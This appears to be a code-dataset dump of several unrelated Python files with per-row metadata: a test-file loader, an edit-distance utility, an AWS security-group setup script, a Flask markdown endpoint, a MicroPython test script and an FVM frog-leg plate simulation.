raise ValueError(f'Unknown extension: {extension}')
class WithId:
@property
def id(self):
return '.'.join(map(str, self._id))
def _get_id(self, *k: int):
return list(self._id) + list(k)
class TestSequence(Sequence):
def __len__(self):
return len(self._tests)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self._tests) + ')'
def __getitem__(self, item):
return self._tests[item]
class Test(dict, WithId):
""" Functional test descriptior. """
def __init__(self, *args, executable: Executable = None, id=[], skip=False):
super(Test, self).__init__(*args)
self.__dict__ = self
self._id = id
self._skip = skip
self.executable = check_executable(executable)
def __repr__(self):
return self.__class__.__name__ + '(' + super().__repr__() + ')'
class Group(TestSequence, WithId):
""" Group of functional tests optionally identified by a name. """
def __init__(self, tests, name: str = '', executable: Executable = None,
id: list = [], skip=False):
self._tests = tests
self.name = name
self.executable = check_executable(executable)
self._skip = skip
self._id = id
class Tests(TestSequence, WithId):
_group_class = Group
_unit_class = Test
def __init__(self, data=None, path=None, executable: Executable = None,
id=[], skip=False):
if not isinstance(data, dict):
data = self._load(path)
data = schema.schema(data) # Validate
tests = data.pop('tests')
self.__dict__ = data
self.filename = path
self.executable = check_executable(executable, self.filters)
self._id = id
self._skip = skip
self._tests = list(self._build(tests, self._id, self.executable))
def _load(self, path=None):
if not path:
path = os.path.realpath('.')
if path and not os.path.isfile(path):
old_path = path
path = find_testfile(path)
if not path:
raise(ValueError(
f"Couldn't find and configuration file in '{old_path}'"))
return load(path)
def _build(self, tests, id=[], executable=None, skip=False):
for index, test in enumerate(tests, start=1):
new_id = id + [index]
kwargs = {'id': new_id, 'skip': skip, 'executable': executable}
if 'executable' in test and test['executable'] is not None:
if os.path.isfile(test['executable']):
kwargs['executable'] = Executable(test['executable'])
else:
kwargs['skip'] = True
if 'tests' in test:
yield self._group_class(
list(self._build(test['tests'], **kwargs)),
name=test['name'], **kwargs)
else:
yield self._unit_class(test, **kwargs)
| """
Read and validate test file.
"""
import yaml
import json
import os
from collections.abc import Sequence
from . import schema, Executable
def check_executable(executable: Executable, filters=None):
if executable and not isinstance(executable, Executable):
raise AttributeError('Not an instance of Executable')
if executable and filters:
executable.filters = filters
return executable
def find_testfile(path=None):
"""Recursively find the tests description file."""
if not path:
path = os.path.dirname(os.path.realpath('.'))
if not os.path.isdir(path):
raise ValueError(f"Path name '{path}' is not a directory")
for filename in ['baygon', 't', 'test', 'tests']:
for ext in ['json', 'yml', 'yaml']:
f = os.path.join(path, f"{filename}.{ext}")
if os.path.exists(f):
return f
# Recursively search in parent directories
if os.path.dirname(path) != path: # Test if root directory
return find_testfile(os.path.dirname(path))
def load(filename):
"""Load a configuration file (can be YAML or JSON)."""
def loadYaml(filename):
with open(filename) as fp:
return yaml.load(fp, Loader=yaml.FullLoader)
def loadJson(filename):
with open(filename) as fp:
return json.load(fp)
extension = os.path.splitext(filename)[1]
if extension in ['.yml', '.yaml']:
return loadYaml(filename)
if extension in ['.json']:
return loadJson(filename)
raise ValueError(f'Unknown extension: {extension}')
class WithId:
@property
def id(self):
return '.'.join(map(str, self._id))
def _get_id(self, *k: int):
return list(self._id) + list(k)
class TestSequence(Sequence):
def __len__(self):
return len(self._tests)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self._tests) + ')'
def __getitem__(self, item):
return self._tests[item]
class Test(dict, WithId):
""" Functional test descriptior. """
def __init__(self, *args, executable: Executable = None, id=[], skip=False):
super(Test, self).__init__(*args)
self.__dict__ = self
self._id = id
self._skip = skip
self.executable = check_executable(executable)
def __repr__(self):
return self.__class__.__name__ + '(' + super().__repr__() + ')'
class Group(TestSequence, WithId):
""" Group of functional tests optionally identified by a name. """
def __init__(self, tests, name: str = '', executable: Executable = None,
id: list = [], skip=False):
self._tests = tests
self.name = name
self.executable = check_executable(executable)
self._skip = skip
self._id = id
class Tests(TestSequence, WithId):
_group_class = Group
_unit_class = Test
def __init__(self, data=None, path=None, executable: Executable = None,
id=[], skip=False):
if not isinstance(data, dict):
data = self._load(path)
data = schema.schema(data) # Validate
tests = data.pop('tests')
self.__dict__ = data
self.filename = path
self.executable = check_executable(executable, self.filters)
self._id = id
self._skip = skip
self._tests = list(self._build(tests, self._id, self.executable))
def _load(self, path=None):
if not path:
path = os.path.realpath('.')
if path and not os.path.isfile(path):
old_path = path
path = find_testfile(path)
if not path:
raise(ValueError(
f"Couldn't find and configuration file in '{old_path}'"))
return load(path)
def _build(self, tests, id=[], executable=None, skip=False):
for index, test in enumerate(tests, start=1):
new_id = id + [index]
kwargs = {'id': new_id, 'skip': skip, 'executable': executable}
if 'executable' in test and test['executable'] is not None:
if os.path.isfile(test['executable']):
kwargs['executable'] = Executable(test['executable'])
else:
kwargs['skip'] = True
if 'tests' in test:
yield self._group_class(
list(self._build(test['tests'], **kwargs)),
name=test['name'], **kwargs)
else:
yield self._unit_class(test, **kwargs)
| en | 0.679298 | Read and validate test file. Recursively find the tests description file. # Recursively search in parent directories # Test if root directory Load a configuration file (can be YAML or JSON). Functional test descriptior. Group of functional tests optionally identified by a name. # Validate | 2.747891 | 3 |
src/stringology/ed.py | luismsgomes/stringology | 1 | 6616739 | <reponame>luismsgomes/stringology<gh_stars>1-10
def ed(s1, s2):
'''edit distance
>>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a')
(0, 0, 1, 1, 1)
This implementation takes only O(min(|s1|,|s2|)) space.
'''
m, n = len(s1), len(s2)
if m < n:
m, n = n, m # ensure n <= m, to use O(min(n,m)) space
s1, s2 = s2, s1
d = list(range(n+1))
for i in range(m):
p = i
d[0] = i+1
for j in range(n):
t = 0 if s1[i] == s2[j] else 1
p, d[j+1] = d[j+1], min(p+t, d[j]+1, d[j+1]+1)
return d[n]
def ned(s1, s2):
return ed(s1, s2) / max(1, len(s1), len(s2))
def edsim(s1, s2):
return 1.0 - ned(s1, s2)
| def ed(s1, s2):
'''edit distance
>>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a')
(0, 0, 1, 1, 1)
This implementation takes only O(min(|s1|,|s2|)) space.
'''
m, n = len(s1), len(s2)
if m < n:
m, n = n, m # ensure n <= m, to use O(min(n,m)) space
s1, s2 = s2, s1
d = list(range(n+1))
for i in range(m):
p = i
d[0] = i+1
for j in range(n):
t = 0 if s1[i] == s2[j] else 1
p, d[j+1] = d[j+1], min(p+t, d[j]+1, d[j+1]+1)
return d[n]
def ned(s1, s2):
return ed(s1, s2) / max(1, len(s1), len(s2))
def edsim(s1, s2):
return 1.0 - ned(s1, s2) | en | 0.315355 | edit distance >>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a') (0, 0, 1, 1, 1) This implementation takes only O(min(|s1|,|s2|)) space. # ensure n <= m, to use O(min(n,m)) space | 3.203865 | 3 |
cloud_deployer/aws_handlers/security_group.py | abualy/cloud-deployer | 1 | 6616740 | #!/usr/bin/env python
#import modules
import csv
import time
#Create security group rules within all listed security groups
def sg_create(awsc, my_csv, archi, tags=None):
#open csv file and read each row as dictionary
sg_file = open(my_csv, 'rb')
sg_reader = csv.DictReader(sg_file)
print "########################## Starting security groups creation ###############################"
if 'sg' not in archi:
archi['sg'] = {}
#iterate through rows checking for rules
for sg_dict in sg_reader:
#if security group not created, then create it first
if sg_dict['security_group'] not in archi['sg']:
sg = awsc.create_security_group(name=sg_dict['security_group'], description=sg_dict['sg_description'], vpc_id=archi['vpc'][sg_dict['vpc']], dry_run=False)
time.sleep(3)
sg.add_tag("Name", sg_dict['security_group'])
sg.add_tag("Group", sg_dict['vpc'])
sg.add_tags(tags)
print ">> >> " + sg_dict['security_group'] + " created"
archi['sg'][sg_dict['security_group']] = sg.id
rule = awsc.revoke_security_group_egress(group_id=sg.id, ip_protocol="-1", from_port=-1, to_port=-1, cidr_ip="0.0.0.0/0", dry_run=False)
print sg_dict['security_group'] + " egress closing state: " + str(rule)
if sg_dict['tcp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['udp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['icmp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
print "done creating security groups :) "
return archi
| #!/usr/bin/env python
#import modules
import csv
import time
#Create security group rules within all listed security groups
def sg_create(awsc, my_csv, archi, tags=None):
#open csv file and read each row as dictionary
sg_file = open(my_csv, 'rb')
sg_reader = csv.DictReader(sg_file)
print "########################## Starting security groups creation ###############################"
if 'sg' not in archi:
archi['sg'] = {}
#iterate through rows checking for rules
for sg_dict in sg_reader:
#if security group not created, then create it first
if sg_dict['security_group'] not in archi['sg']:
sg = awsc.create_security_group(name=sg_dict['security_group'], description=sg_dict['sg_description'], vpc_id=archi['vpc'][sg_dict['vpc']], dry_run=False)
time.sleep(3)
sg.add_tag("Name", sg_dict['security_group'])
sg.add_tag("Group", sg_dict['vpc'])
sg.add_tags(tags)
print ">> >> " + sg_dict['security_group'] + " created"
archi['sg'][sg_dict['security_group']] = sg.id
rule = awsc.revoke_security_group_egress(group_id=sg.id, ip_protocol="-1", from_port=-1, to_port=-1, cidr_ip="0.0.0.0/0", dry_run=False)
print sg_dict['security_group'] + " egress closing state: " + str(rule)
if sg_dict['tcp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['udp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['icmp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
print "done creating security groups :) "
return archi
| en | 0.598224 | #!/usr/bin/env python #import modules #Create security group rules within all listed security groups #open csv file and read each row as dictionary ######################### Starting security groups creation ###############################" #iterate through rows checking for rules #if security group not created, then create it first | 2.781606 | 3 |
moto/ds/utils.py | richford/moto | 2 | 6616741 | <reponame>richford/moto
"""Pagination control model for DirectoryService."""
PAGINATION_MODEL = {
"describe_directories": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 100, # This should be the sum of the directory limits
"page_ending_range_keys": ["directory_id"],
},
"list_tags_for_resource": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 50,
"page_ending_range_keys": ["Key"],
},
}
| """Pagination control model for DirectoryService."""
PAGINATION_MODEL = {
"describe_directories": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 100, # This should be the sum of the directory limits
"page_ending_range_keys": ["directory_id"],
},
"list_tags_for_resource": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 50,
"page_ending_range_keys": ["Key"],
},
} | en | 0.833406 | Pagination control model for DirectoryService. # This should be the sum of the directory limits | 1.934679 | 2 |
lesson_builder/config.py | tud-python-courses/lesson-builder | 0 | 6616742 | <filename>lesson_builder/config.py
import logging
import os
__author__ = '<NAME>'
__version__ = '0.1'
DEBUG = True
CONFIG_NAME = 'build_conf.json'
BUILD_TIMEOUT = 2 * 60 # seconds
BASE_DIRECTORY = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
logging.basicConfig(
format='%(levelname)-10s %(asctime)-15s [%(name)s] :: %(message)s',
filename=os.path.join(BASE_DIRECTORY, 'builder.log'),
level=logging.DEBUG if DEBUG else logging.INFO
)
ERROR_LOG_FILE = 'builder-error.log'
INFO_LOG_FILE = 'builder.log' | <filename>lesson_builder/config.py
import logging
import os
__author__ = '<NAME>'
__version__ = '0.1'
DEBUG = True
CONFIG_NAME = 'build_conf.json'
BUILD_TIMEOUT = 2 * 60 # seconds
BASE_DIRECTORY = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
logging.basicConfig(
format='%(levelname)-10s %(asctime)-15s [%(name)s] :: %(message)s',
filename=os.path.join(BASE_DIRECTORY, 'builder.log'),
level=logging.DEBUG if DEBUG else logging.INFO
)
ERROR_LOG_FILE = 'builder-error.log'
INFO_LOG_FILE = 'builder.log' | none | 1 | 2.15135 | 2 | |
app/api/tools.py | YaPunk/bokunosite | 0 | 6616743 | <reponame>YaPunk/bokunosite
from flask import jsonify, request
from markdown2 import markdown
from app import config
from app.api import api
from app.api.errors import bad_request
@api.route('/markdown', methods=['POST'])
def markdown_render():
data = request.get_json()['data']
if len(data) > 50000:
return bad_request()
else:
return jsonify({
"html": markdown(data, extras=config['MARKDOWN_EXTRAS'])
})
| from flask import jsonify, request
from markdown2 import markdown
from app import config
from app.api import api
from app.api.errors import bad_request
@api.route('/markdown', methods=['POST'])
def markdown_render():
data = request.get_json()['data']
if len(data) > 50000:
return bad_request()
else:
return jsonify({
"html": markdown(data, extras=config['MARKDOWN_EXTRAS'])
}) | none | 1 | 2.550071 | 3 | |
micropython/sd/Test.py | webbhm/PiRock | 0 | 6616744 | <filename>micropython/sd/Test.py
"""
THe purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly
Author: <NAME>
Data: 11/13/2020
""""
def test():
# High level test
import LogSensors
LogSensors.test()
# parameter files do not have their own test
def conf_test():
# Dump the configuration parameters
print("\nconf.py test")
try:
import conf
print("SSID", conf.SSID)
print("PWD", conf.PWD)
print("START_TIME", conf.START_TIME)
print("SAMPLE_MIN", conf.SAMPLE_MIN)
print("conf test: PASS")
except Exception as e:
# Print error in RED
print("/033[1;31;40m ERROR: Failed conf test - ", str(e))
def env_test():
print("\n env test")
try:
import env
print(env)
print("env test: PASS")
except Exception as e:
print("ERROR: Failed env test - ", str(e))
def detail_test():
# most modules have their own test
print("\n Test configuration files")
conf_test()
env_test()
print("\n Test sensors")
import BME280
BME280.test()
import Turbidity()
Turbidity.test()
import EC
EC.test()
print("\n High level functions")
test()
| <filename>micropython/sd/Test.py
"""
THe purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly
Author: <NAME>
Data: 11/13/2020
""""
def test():
# High level test
import LogSensors
LogSensors.test()
# parameter files do not have their own test
def conf_test():
# Dump the configuration parameters
print("\nconf.py test")
try:
import conf
print("SSID", conf.SSID)
print("PWD", conf.PWD)
print("START_TIME", conf.START_TIME)
print("SAMPLE_MIN", conf.SAMPLE_MIN)
print("conf test: PASS")
except Exception as e:
# Print error in RED
print("/033[1;31;40m ERROR: Failed conf test - ", str(e))
def env_test():
print("\n env test")
try:
import env
print(env)
print("env test: PASS")
except Exception as e:
print("ERROR: Failed env test - ", str(e))
def detail_test():
# most modules have their own test
print("\n Test configuration files")
conf_test()
env_test()
print("\n Test sensors")
import BME280
BME280.test()
import Turbidity()
Turbidity.test()
import EC
EC.test()
print("\n High level functions")
test()
| en | 0.781746 | THe purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly Author: <NAME> Data: 11/13/2020 # High level test # parameter files do not have their own test # Dump the configuration parameters # Print error in RED # most modules have their own test | 2.657339 | 3 |
src/fvm/test/COUPLING/frogleg_plate.py | drm42/fvm-drm | 0 | 6616745 | #!/usr/bin/env python
### this script solve frogleg pull-in by coupling
### plate model and electrostatics via IBM
### import modules ###
import pdb
import sys
import os
from math import *
sys.setdlopenflags(0x100|0x2)
#import tecplotExporter
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
from FluentCase import FluentCase
from fvm.fvmbaseExt import VecD3
from mpi4py import MPI
import time
def checkMarking(n):
cells = fluidMeshes[0].getCells()
nCells = cells.getCount()
cellCoords = geomFields.coordinate[cells].asNumPyArray()
fluidFile = open(fileBase + "fluidCells_" + str(n) + ".dat", "w")
solidFile = open(fileBase + "solidCells_" + str(n) + ".dat", "w")
IBFile = open(fileBase + "IBCells_" + str(n) + ".dat", "w")
cellIBType = geomFields.ibType[cells].asNumPyArray()
for c in range (0, nCells):
ibtype = cellIBType[c]
if ibtype == -1:
fluidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -2:
IBFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -3:
solidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -5:
print ("%i\t%i\t%e\t%e\n" % (c,ibtype, cellCoords[c][0], cellCoords[c][1]))
fluidFile.close()
solidFile.close()
IBFile.close()
def writeProbeData():
deformation = plateFields.deformation[solidMeshes[0].getCells()].asNumPyArray()
maxDef = deformation.min(axis = 0)
probeFile.write('%e\t%e\t%e\n' % (globalTime, deformation[probeIndex][2], maxDef[2]))
probeFile.flush()
def saveVTK(n):
writer = exporters.VTKWriterA(geomFields,fluidMeshes,
fileBase + "elecfield-" + str(n) + ".vtk",
"frogleg",
False,0)
writer.init()
writer.writeScalarField(elecFields.potential,"potential")
writer.writeVectorField(elecFields.electric_field,"potentialgradient")
writer.finish()
writer1 = exporters.VTKWriterA(geomFields,solidMeshes,
fileBase + "deformation-" + str(n) + ".vtk",
"frogleg",
False,0)
writer1.init()
writer1.writeVectorField(plateFields.deformation,"deformation")
writer1.finish()
### ========================== properties and parameters ===============================###
### beam
rho = 8912 # density kg/m^3
E = 200e9 # Young's modulus
nu = 0.31 # Poisson's ratio
### electric field
applied_voltage = -100
dielectric_constant = 1.0
beam_thickness = 3e-6
### mesh id
fluidTop = 7
fluidBot = [9,3]
fluidSide = 8
left_electrode = 4
right_electrode = 5
central_electrode = 6
beam = [3]
anchors = [4, 5, 6, 7]
numTimeSteps = 1
globalTime = 0
globalCount = 0
timeStep = 5e-8
saveFrequency = 50
initialTransient = False
probeIndex = 50
### ===================== mesh read ===============================================###
fileBase = "./"
### 2D plate mesh
beamReader = FluentCase(sys.argv[2])
beamReader.read();
solidMeshes = beamReader.getMeshList()
geomFields = models.GeomFields('geom')
solidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidMeshes)
solidMetricsCalculator.init()
### 3D fluid mesh
fluidReader = FluentCase(sys.argv[1])
fluidReader.read();
fluidMeshes = fluidReader.getMeshList()
fluidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,fluidMeshes)
fluidMetricsCalculator.init()
nodes = fluidMeshes[0].getNodes()
xn = fluidMeshes[0].getNodeCoordinates().asNumPyArray()
for n in range(0, nodes.getCount()):
x = xn[n][0]
y = xn[n][1]
xn[n][0] = -y
xn[n][1] = x
fluidMetricsCalculator.init()
### generate solid boundary mesh
solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
solidBoundaryMetricsCalculator.init()
### find device center
cells = solidMeshes[0].getCells()
xc = geomFields.coordinate[cells].asNumPyArray()
small = 100
probeIndex = 0
for c in range(0, cells.getCount()):
rsqr = xc[c][0]*xc[c][0] + xc[c][1]*xc[c][1]
if rsqr < small:
small = rsqr
probeIndex = c
### output files
probeFile = open(fileBase + "centerDisplacement.dat", "w")
### =============================== models =====================================###
### Plate Model and boundary conditions ###
plateFields = models.PlateFields('plate')
pmodel = models.PlateModelA(geomFields,plateFields,solidMeshes)
dmodel = models.PlateDeformationModelA(geomFields,plateFields,solidMeshes)
bcMap = pmodel.getBCMap()
for id in anchors:
bc = bcMap[id]
bc.bcType = 'Clamped'
bc['specifiedXRotation']=0
bc['specifiedYRotation']=0.
bc['specifiedZDeformation']=0.
for id in beam:
bc = bcMap[id]
bc.bcType = 'SpecifiedTraction'
vcMap = pmodel.getVCMap()
for i,vc in vcMap.iteritems():
vc['density'] = rho
vc['ym'] = E
vc['nu'] = nu
### electric model and boundary condition ###
elecFields = models.ElectricFields('elec')
emodel = models.ElectricModelA(geomFields,elecFields,fluidMeshes)
bcMap = emodel.getBCMap()
bc = bcMap[central_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = applied_voltage
bc = bcMap[left_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[right_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[fluidTop]
bc.bcType = "Symmetry"
for i in fluidBot:
bc = bcMap[i]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
for i in [fluidSide]:
bc = bcMap[i]
bc.bcType = "Symmetry"
vcMap = emodel.getVCMap()
for i,vc in vcMap.iteritems():
vc.vcType = "dielectric"
vc['dielectric_constant'] = dielectric_constant
### ================================= solvers ===================================###
### plate solver ###
pc = fvmbaseExt.AMG()
pc.verbosity=0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 50000
defSolver.verbosity=0
poptions = pmodel.getOptions()
poptions.deformationLinearSolver = defSolver
poptions.deformationTolerance=1.0e-3
poptions.setVar("deformationURF",1.0)
poptions.printNormalizedResiduals=True
poptions.timeDiscretizationOrder = 2
poptions.transient=True
poptions.scf = 5./6.
poptions.setVar('timeStep',timeStep)
### elec solver ###
epc = fvmbaseExt.AMG()
epc.verbosity=0
elecSolver = fvmbaseExt.BCGStab()
elecSolver.preconditioner = epc
elecSolver.relativeTolerance = 1e-3
elecSolver.nMaxIterations = 1000
elecSolver.maxCoarseLevels=20
elecSolver.verbosity=0
eoptions = emodel.getOptions()
eoptions.electrostaticsLinearSolver = elecSolver
eoptions.electrostaticsTolerance = 0.5e-5
eoptions.electrostatics_enable = 1
eoptions.chargetransport_enable = 0
eoptions.tunneling = 0
eoptions.ibm_enable = 1
eoptions.transient_enable = False
eoptions.printNormalizedResiduals = True
### initialize models and run ###
pmodel.init()
emodel.init()
dmodel.init()
ibManager = fvmbaseExt.IBManager(geomFields,
solidBoundaryMeshes[0],
fluidMeshes)
for mesh in solidBoundaryMeshes:
faces = mesh.getFaces()
areaMag = geomFields.areaMag[faces]
faceCount = faces.getCount()
pot = areaMag.newSizedClone(faceCount)
pota = pot.asNumPyArray()
pota[:] = 0
elecFields.potential[faces] = pot
sbMeshFaces = solidBoundaryMeshes[0].getFaces()
ibManager.fluidNeighborsPerIBFace = 4
ibManager.solidNeighborsPerIBFace = 4
ibManager.fluidNeighborsPerSolidFace = 6
ibManager.update()
checkMarking(globalCount)
t1 = time.time()
pc.redirectPrintToFile("convergence.dat")
#--------------Timestep Loop --------------------------#
for n in range(0, numTimeSteps):
# --------------- update IBM -------------------------#
print "*** update IBM at globalCount %i ***" % globalCount
ibManager.update()
fluidMetricsCalculator.computeIBInterpolationMatrices(sbMeshFaces)
fluidMetricsCalculator.computeSolidInterpolationMatrices(sbMeshFaces)
#------------solve electrostatics--------#
print "*** solving electric model at globalCount %i ***" % globalCount
for i in range(0, 10):
emodel.computeIBFacePotential(sbMeshFaces)
emodel.advance(1)
emodel.computeSolidSurfaceForcePerUnitArea(sbMeshFaces)
#saveVTK(n)
#------------update force on beam ----------#
print "*** update force at globalCount %i ***" % globalCount
sbElecForce = elecFields.force[sbMeshFaces].asNumPyArray()
solidMesh = solidMeshes[0]
solidCells = solidMesh.getCells()
nCells = solidCells.getCount()
nSelfCells = solidCells.getSelfCount()
nSBFaces = sbMeshFaces.getCount()
if (nSBFaces != 2*nSelfCells+(nCells-nSelfCells)):
print "the extruded solid boundary mesh has wrong face numbers!"
force = plateFields.force[solidCells].asNumPyArray()
thickness = plateFields.thickness[solidCells].asNumPyArray()
force[:] = 0.
thickness[:] = beam_thickness
# force on interior cells
for c in range(0, nSelfCells):
botFaceIndex = c
topFaceIndex = c+nSelfCells
force[c] = sbElecForce[botFaceIndex][2] + sbElecForce[topFaceIndex][2]
# force on boundary cells
for c in range(nSelfCells, nCells):
force[c] = sbElecForce[nSelfCells+c][2]
#pdb.set_trace()
#------------solve structure-------------#
print "*** solving structure model at globalCount %i ***" % globalCount
for i in range (0, 3):
pmodel.advance(1)
dmodel.calculateNodeDisplacement()
dmodel.deformPlate()
solidMetricsCalculator.recalculate_deform()
#------------update solid boundary mesh---------------#
#solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
sbNodes = solidBoundaryMeshes[0].getNodes()
nSBNodes = sbNodes.getCount()
nodes = solidMeshes[0].getNodes()
if nSBNodes != nodes.getCount()*2:
print "the extruded solid mesh has wrong node number!"
nodeCoord = geomFields.coordinate[nodes].asNumPyArray()
bNodeCoord = geomFields.coordinate[sbNodes].asNumPyArray()
bMeshCoord = solidBoundaryMeshes[0].getNodeCoordinates().asNumPyArray()
deformation = geomFields.nodeDisplacement[nodes].asNumPyArray()
#pdb.set_trace()
for sbn in range (0, nSBNodes/2):
bNodeCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
bMeshCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
for sbn in range (nSBNodes/2, nSBNodes):
bNodeCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
bMeshCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
#pdb.set_trace()
#solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
#solidBoundaryMetricsCalculator.init()
solidBoundaryMetricsCalculator.recalculate_deform()
# -----------------update time --------------------------#
pmodel.updateTime()
dmodel.updateTime()
globalTime += timeStep
globalCount += 1
#------data output-----------------------#
writeProbeData()
if (n%saveFrequency == 0):
saveVTK(n)
# checkMarking(globalCount)
t2 = time.time()
pc.redirectPrintToScreen()
probeFile.close()
print '\nsolution time = %f' % (t2-t1)
| #!/usr/bin/env python
### this script solve frogleg pull-in by coupling
### plate model and electrostatics via IBM
### import modules ###
import pdb
import sys
import os
from math import *
